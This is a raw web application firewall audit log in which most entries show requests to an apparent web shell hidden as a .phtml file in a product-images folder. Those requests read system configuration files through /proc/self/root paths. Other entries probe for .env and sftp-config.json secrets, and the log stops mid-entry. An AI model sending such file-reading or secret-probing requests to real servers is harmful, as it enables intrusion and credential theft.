[tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ldap/ldap.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ldap/ldap.conf found within ARGS:viewfile: /proc/thread-self/root/etc/ldap/ldap.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKlaC450Yw050Ymr0QtwAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108821791012 4278 (- - -) Stopwatch2: 1750108821791012 4278; combined=2266, p1=368, p2=1746, p3=37, p4=36, p5=79, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9406e40c-Z-- --b2a7af4a-A-- [17/Jun/2025:02:50:23.614139 +0530] aFCKl0cTB7P_sALtclAD7QAAAAI 216.73.216.71 44498 127.0.0.1 7081 --b2a7af4a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fkmod HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b2a7af4a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3865 Connection: close Content-Type: text/html; charset=UTF-8 --b2a7af4a-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKl0cTB7P_sALtclAD7QAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/kmod"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCKl0cTB7P_sALtclAD7QAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108823609970 4224 (- - -) Stopwatch2: 1750108823609970 4224; combined=2267, p1=329, p2=1776, p3=41, p4=34, p5=87, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2a7af4a-Z-- --33d7634e-A-- [17/Jun/2025:02:51:20.744142 +0530] aFCK0KEB9lmWsOo-rPOPJQAAAAU 216.73.216.71 45984 127.0.0.1 7081 --33d7634e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fplymouth-log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --33d7634e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3410 Connection: close Content-Type: text/html; charset=UTF-8 --33d7634e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/plymouth-log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCK0KEB9lmWsOo-rPOPJQAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/plymouth-log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCK0KEB9lmWsOo-rPOPJQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750108880740315 3880 (- - -) Stopwatch2: 1750108880740315 3880; combined=2051, p1=309, p2=1581, p3=47, p4=31, p5=82, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33d7634e-Z-- --f774ce28-A-- [17/Jun/2025:02:56:11.582644 +0530] aFCL8lJfblPUQiSn5r19QgAAAAA 52.164.218.116 44132 127.0.0.1 7081 --f774ce28-B-- GET /hitech-news.com HTTP/1.0 Host: best-website-designs.com X-Real-IP: 52.164.218.116 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --f774ce28-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --f774ce28-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||best-website-designs.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||best-website-designs.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "best-website-designs.com"] [uri "/hitech-news.com"] [unique_id "aFCL8lJfblPUQiSn5r19QgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750109170816610 766103 (- - -) Stopwatch2: 1750109170816610 766103; combined=2421, p1=398, p2=1940, p3=0, p4=0, p5=82, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f774ce28-Z-- --f1070e54-A-- [17/Jun/2025:02:58:09.615134 +0530] aFCMaUcTB7P_sALtclAFRgAAAAI 216.73.216.71 41334 127.0.0.1 7081 --f1070e54-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Finit.d%2Fplymouth HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f1070e54-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3667 Connection: close Content-Type: text/html; charset=UTF-8 --f1070e54-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/plymouth"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCMaUcTB7P_sALtclAFRgAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/self/root/etc/init.d/plymouth"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCMaUcTB7P_sALtclAFRgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750109289610850 4341 (- - -) Stopwatch2: 1750109289610850 4341; combined=2450, p1=342, p2=1944, p3=41, p4=33, p5=90, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1070e54-Z-- --8046dd7a-A-- [17/Jun/2025:03:07:11.772863 +0530] aFCOh6RT9PYLci8mxb0bSAAAAAM 216.73.216.71 45496 127.0.0.1 7081 --8046dd7a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapache2&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapache2%2Fports.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --8046dd7a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3187 Connection: close Content-Type: text/html; charset=UTF-8 --8046dd7a-H-- Message: Warning. Matched phrase "etc/apache2/ports.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/ports.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apache2/ports.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/ports.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/ports.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apache2/ports.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCOh6RT9PYLci8mxb0bSAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750109831768033 4906 (- - -) Stopwatch2: 1750109831768033 4906; combined=2702, p1=473, p2=2073, p3=42, p4=44, p5=70, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8046dd7a-Z-- --84583122-A-- [17/Jun/2025:03:10:05.739008 +0530] aFCPL1JfblPUQiSn5r1_lQAAAAA 167.99.71.58 60622 127.0.0.1 7081 --84583122-B-- GET /sftp-config.json HTTP/1.0 Host: www.home9ine.com X-Real-IP: 167.99.71.58 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --84583122-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=f32780e38b1cdc44bb9fbad2c340f73d1750110005; expires=Mon, 16 Jun 2025 22:40:05 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --84583122-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.home9ine.com"] [uri "/sftp-config.json"] [unique_id "aFCPL1JfblPUQiSn5r1_lQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750109999345566 6393520 (- - -) Stopwatch2: 1750109999345566 6393520; combined=1762, p1=393, p2=1269, p3=0, p4=0, p5=99, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --84583122-Z-- --bda4ef3b-A-- [17/Jun/2025:03:11:43.003158 +0530] aFCPlqRT9PYLci8mxb0cEwAAAAM 216.73.216.71 52614 127.0.0.1 7081 --bda4ef3b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fld.so.conf.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fld.so.conf.d%2Flibc.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bda4ef3b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3019 Connection: close Content-Type: text/html; charset=UTF-8 --bda4ef3b-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /proc/self/root/etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCPlqRT9PYLci8mxb0cEwAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /proc/self/root/etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCPlqRT9PYLci8mxb0cEwAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750110102998979 4233 (- - -) Stopwatch2: 1750110102998979 4233; combined=2161, p1=347, p2=1662, p3=37, p4=29, p5=86, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bda4ef3b-Z-- --4a5c1040-A-- [17/Jun/2025:03:14:20.432928 +0530] aFCQNKRT9PYLci8mxb0chgAAAAM 216.73.216.71 53750 127.0.0.1 7081 --4a5c1040-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fld.so.conf.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fld.so.conf.d%2Flibc.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4a5c1040-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3023 Connection: close Content-Type: text/html; charset=UTF-8 --4a5c1040-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /snap/core20/2599/etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /snap/core20/2599/etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /snap/core20/2599/etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCQNKRT9PYLci8mxb0chgAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /snap/core20/2599/etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCQNKRT9PYLci8mxb0chgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750110260428185 4796 (- - -) Stopwatch2: 1750110260428185 4796; combined=2375, p1=372, p2=1845, p3=41, p4=31, p5=86, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a5c1040-Z-- --741d9e33-A-- [17/Jun/2025:03:17:24.518276 +0530] aFCQ6ooVQnPDyHnl9oPCqAAAAAY 185.177.72.115 50696 127.0.0.1 7081 --741d9e33-B-- GET /.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --741d9e33-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=6gg8d8gdm5vieahnpnd88tkc3v; path=/ Set-Cookie: _sfs_id=b3a2bf1ca42dc1300749a63f73823cb51750110443; expires=Mon, 16 Jun 2025 22:47:23 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --741d9e33-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env"] [unique_id "aFCQ6ooVQnPDyHnl9oPCqAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110442781437 1736923 (- - -) Stopwatch2: 1750110442781437 1736923; combined=2070, p1=435, p2=1549, p3=0, p4=0, p5=85, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --741d9e33-Z-- --359e3533-A-- [17/Jun/2025:03:17:26.344900 +0530] aFCQ7BwcFb_n1P0IC9yEdwAAAAo 185.177.72.115 50784 127.0.0.1 7081 --359e3533-B-- GET /.env.local HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --359e3533-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=j6hbbbr7o9c5vd8308seo4tfck; path=/ Set-Cookie: _sfs_id=0dbadd128077b4f025a4147f4dbb21f01750110445; expires=Mon, 16 Jun 2025 22:47:25 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --359e3533-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.local"] [unique_id "aFCQ7BwcFb_n1P0IC9yEdwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110444641570 1703416 (- - -) Stopwatch2: 1750110444641570 1703416; combined=1887, p1=449, p2=1345, p3=0, p4=0, p5=93, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --359e3533-Z-- --9d623520-A-- [17/Jun/2025:03:17:28.198358 +0530] aFCQ7grsPejRtmHkrKLPsAAAAAE 185.177.72.115 50822 127.0.0.1 7081 --9d623520-B-- GET /.env.production HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 